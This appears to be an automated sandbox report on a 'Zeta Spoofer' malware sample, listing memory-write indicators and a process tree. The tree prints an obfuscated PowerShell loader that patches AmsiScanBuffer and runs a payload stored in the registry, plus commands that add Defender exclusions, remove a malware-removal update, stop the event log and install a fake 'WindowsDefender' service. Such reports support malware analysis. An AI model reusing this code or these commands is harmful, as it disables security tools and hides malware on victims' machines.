2452	Zeta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2740 wrote to memory of 4676	2740	Zeta Spoofer.exe	83
PID 2740 wrote to memory of 4676	2740	Zeta Spoofer.exe	83
PID 2740 wrote to memory of 4676	2740	Zeta Spoofer.exe	83
PID 2740 wrote to memory of 4496	2740	Zeta Spoofer.exe	84
PID 2740 wrote to memory of 4496	2740	Zeta Spoofer.exe	84
PID 4676 wrote to memory of 2452	4676	Zeta.exe	85
PID 4676 wrote to memory of 2452	4676	Zeta.exe	85
PID 4676 wrote to memory of 2452	4676	Zeta.exe	85
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 4496 wrote to memory of 1628	4496	ZetaSpoofer.exe	104
PID 1404 wrote to memory of 3084	1404	cmd.exe	110
PID 1404 wrote to memory of 3084	1404	cmd.exe	110
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4716	2896	Defenderupdates.exe	128
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4460	2896	Defenderupdates.exe	129
PID 2896 wrote to memory of 4368	2896	Defenderupdates.exe	131
PID 2896 wrote to memory of 4368	2896	Defenderupdates.exe	131
PID 2896 wrote to memory of 4368	2896	Defenderupdates.exe	131
PID 2896 wrote to memory of 4368	2896	Defenderupdates.exe	131
PID 2896 wrote to memory of 4368	2896	Defenderupdates.exe	131
PID 1260 wrote to memory of 4004	1260	cmd.exe	138
PID 1260 wrote to memory of 4004	1260	cmd.exe	138
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4332 wrote to memory of 4884	4332	powershell.EXE	140
PID 4884 wrote to memory of 616	4884	dllhost.exe	5
PID 4884 wrote to memory of 676	4884	dllhost.exe	7
PID 4884 wrote to memory of 956	4884	dllhost.exe	12
PID 4884 wrote to memory of 384	4884	dllhost.exe	13
PID 4884 wrote to memory of 744	4884	dllhost.exe	14
PID 4884 wrote to memory of 952	4884	dllhost.exe	16
PID 4884 wrote to memory of 1056	4884	dllhost.exe	17
PID 4884 wrote to memory of 1076	4884	dllhost.exe	18
PID 4884 wrote to memory of 1172	4884	dllhost.exe	19
PID 4884 wrote to memory of 1224	4884	dllhost.exe	20
PID 4884 wrote to memory of 1236	4884	dllhost.exe	21
PID 4884 wrote to memory of 1244	4884	dllhost.exe	22
PID 4884 wrote to memory of 1352	4884	dllhost.exe	23
PID 4884 wrote to memory of 1388	4884	dllhost.exe	24
PID 4884 wrote to memory of 1436	4884	dllhost.exe	25
PID 4884 wrote to memory of 1448	4884	dllhost.exe	26
PID 4884 wrote to memory of 1528	4884	dllhost.exe	27
PID 4884 wrote to memory of 1592	4884	dllhost.exe	28

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{cdf7e8a2-c0c6-417d-94b0-45b6d29a73dd}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4884
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4c077338-8fc2-40e9-8bf9-74642c6d7bdb}
  2⤵
  PID:1364

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1056

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1172
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:1044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CEmvfWfRCmhO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CFQZTZlkbNJZcd,[Parameter(Position=1)][Type]$euACuOVJRt)$phozoeyZlxI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fl'+'e'+'c'+[Char](116)+'edDe'+[Char](108)+''+[Char](101)+'ga'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+'b'+'l'+''+'i'+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+'An'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+'a'+'s'+[Char](115)+''+[Char](44)+'Au'+[Char](116)+'oC'+'l'+''+[Char](97)+'ss',[MulticastDelegate]);$phozoeyZlxI.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+'e'+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+'ub'+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$CFQZTZlkbNJZcd).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$phozoeyZlxI.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pub'+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+'B'+'y'+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+'l'+'o'+''+'t'+''+[Char](44)+''+[Char](86)+'irt'+'u'+''+[Char](97)+''+[Char](108)+'',$euACuOVJRt,$CFQZTZlkbNJZcd).SetImplementationFlags(''+'R'+''+'u'+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'an'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $phozoeyZlxI.CreateType();}$XRthEjsfgUdmq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+'in32'+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+'a'+[Char](116)+'i'+'v'+'e'+[Char](77)+''+'e'+''+'t'+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$jXntdmrkUQHsvD=$XRthEjsfgUdmq.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'c'+[Char](65)+''+[Char](100)+'d'+'r'+''+'e'+'s'+[Char](115)+'',[Reflection.BindingFlags]('P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CvXWbHPQdoucakPBOiw=CEmvfWfRCmhO @([String])([IntPtr]);$CxtWlviRDPwhtEsfpNVBLH=CEmvfWfRCmhO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$RbJapYmlqgv=$XRthEjsfgUdmq.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'ndl'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+'.'+'d'+''+[Char](108)+'l')));$hZWBaDPYuDuKCI=$jXntdmrkUQHsvD.Invoke($Null,@([Object]$RbJapYmlqgv,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+'r'+'a'+'r'+'y'+[Char](65)+'')));$YQwMzVghIQoOEYjPw=$jXntdmrkUQHsvD.Invoke($Null,@([Object]$RbJapYmlqgv,[Object](''+'V'+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+'te'+'c'+''+'t'+'')));$JUeRLNF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hZWBaDPYuDuKCI,$CvXWbHPQdoucakPBOiw).Invoke(''+[Char](97)+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$EjWjOsXajRsClMwTe=$jXntdmrkUQHsvD.Invoke($Null,@([Object]$JUeRLNF,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+'f'+'e'+[Char](114)+'')));$aTleZyznxf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YQwMzVghIQoOEYjPw,$CxtWlviRDPwhtEsfpNVBLH).Invoke($EjWjOsXajRsClMwTe,[uint32]8,4,[ref]$aTleZyznxf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EjWjOsXajRsClMwTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YQwMzVghIQoOEYjPw,$CxtWlviRDPwhtEsfpNVBLH).Invoke($EjWjOsXajRsClMwTe,[uint32]8,0x20,[ref]$aTleZyznxf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FzmVAMyMmfFt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YfTbioBxZmxcqd,[Parameter(Position=1)][Type]$ewkSZPDWwN)$lFFraEgBhfc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+'e'+'c'+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+''+[Char](84)+'y'+'p'+''+[Char](101)+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+'al'+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+'l'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$lFFraEgBhfc.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+'p'+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+'e'+[Char](44)+''+'H'+''+'i'+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$YfTbioBxZmxcqd).SetImplementationFlags('R'+'u'+''+'n'+'t'+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$lFFraEgBhfc.DefineMethod('I'+[Char](110)+'v'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+'wS'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+'V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$ewkSZPDWwN,$YfTbioBxZmxcqd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+'e'+','+'Mana'+'g'+''+'e'+''+[Char](100)+'');Write-Output $lFFraEgBhfc.CreateType();}$GIKZDiKfhTMUF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'s'+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+'s'+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'nsa'+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+'ti'+[Char](118)+'eM'+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$oKhUOKeMUvyJgm=$GIKZDiKfhTMUF.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+''+[Char](114)+'o'+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$uLuOkYFDjToiBVUdLyJ=FzmVAMyMmfFt @([String])([IntPtr]);$cVTsIbYvdKVuppGKEuBcwA=FzmVAMyMmfFt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jlFbbTmtoLP=$GIKZDiKfhTMUF.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+'n'+'d'+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$RAdROPzByKNkbC=$oKhUOKeMUvyJgm.Invoke($Null,@([Object]$jlFbbTmtoLP,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$CPHTgujGAawCpskLA=$oKhUOKeMUvyJgm.Invoke($Null,@([Object]$jlFbbTmtoLP,[Object]('V'+[Char](105)+''+'r'+''+'t'+'ua'+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+'t')));$JXzOVIx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RAdROPzByKNkbC,$uLuOkYFDjToiBVUdLyJ).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$HsDmDsZlfHodXiOLM=$oKhUOKeMUvyJgm.Invoke($Null,@([Object]$JXzOVIx,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+'an'+[Char](66)+''+'u'+'ff'+'e'+''+[Char](114)+'')));$IFByHljebn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CPHTgujGAawCpskLA,$cVTsIbYvdKVuppGKEuBcwA).Invoke($HsDmDsZlfHodXiOLM,[uint32]8,4,[ref]$IFByHljebn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HsDmDsZlfHodXiOLM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CPHTgujGAawCpskLA,$cVTsIbYvdKVuppGKEuBcwA).Invoke($HsDmDsZlfHodXiOLM,[uint32]8,0x20,[ref]$IFByHljebn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+'T'+'W'+[Char](65)+'R'+'E'+'').GetValue('d'+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3964
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1388
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1660

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2040

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2504

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2548

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3352

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3428
- C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe
  "C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
    "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4676
  - - C:\Users\Admin\AppData\Local\Temp\Zeta.exe
      "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe
    "C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4496
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1404
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3084
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3064
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:4980
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:1180
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      PID:1628
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:4800
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1896
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5060
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsDefender"
      4⤵
      Launches sc.exe
      PID:1900

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3752

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3904

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:4920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4524

